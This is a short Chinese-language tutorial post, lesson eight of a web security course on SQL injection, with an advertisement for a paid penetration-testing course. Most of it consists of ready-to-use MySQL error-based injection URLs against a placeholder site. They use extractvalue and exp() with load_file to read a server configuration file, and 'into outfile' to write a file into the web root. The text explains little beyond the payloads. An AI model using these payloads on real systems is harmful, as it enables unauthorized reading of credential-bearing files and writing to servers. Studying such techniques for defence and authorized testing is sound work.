[原创]WEB安全第四章SQL注入篇08 报错注入读取文件
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
WEB安全第四章SQL注入篇08 报错注入读取文件
上一课 给大家讲解了 mysql报错注入 其实他还有一些用法
例如读取文件
extractvalue 读取文件
http://target_sys.com/mysqlinj.php?id=-1 and (extractvalue(1,concat(0x7e,(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’)),0x7e)))
exp方法读取
http://target_sys.com/mysqlinj.php?id=1 and (exp(~(select*from(select load_file(‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.php’))a)));
![[原创]WEB安全第四章SQL注入篇08 报错注入读取文件](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
写文件
http://target_sys.com/mysqlinj.php?id=-1 and exp(~(select*from(select ‘hello’)a)) into outfile ‘C:\inetpub\wwwroot\target_sys.com\data\config.inc.txt’;
写文件默认就是只能写入0到文件里面 。
原创文章,作者:mOon,如若转载,请注明出处:https://www.moonsec.com/154.html